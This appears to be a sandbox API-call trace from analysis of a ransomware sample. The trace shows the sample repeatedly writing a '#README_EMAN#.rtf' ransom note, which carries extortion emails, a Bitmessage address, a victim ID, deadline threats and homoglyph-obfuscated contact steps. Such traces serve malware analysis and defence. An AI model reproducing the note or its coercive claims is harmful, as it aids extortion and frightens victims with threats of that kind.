INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9fcN", lpUsedDefaultChar=0x0) returned 8717 [0278.187] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.188] CloseHandle (hObject=0x294) returned 1 [0278.188] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\#readme_eman#.rtf")) returned 0xffffffff [0278.188] GetLastError () returned 0x2 [0278.188] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.189] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.189] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED 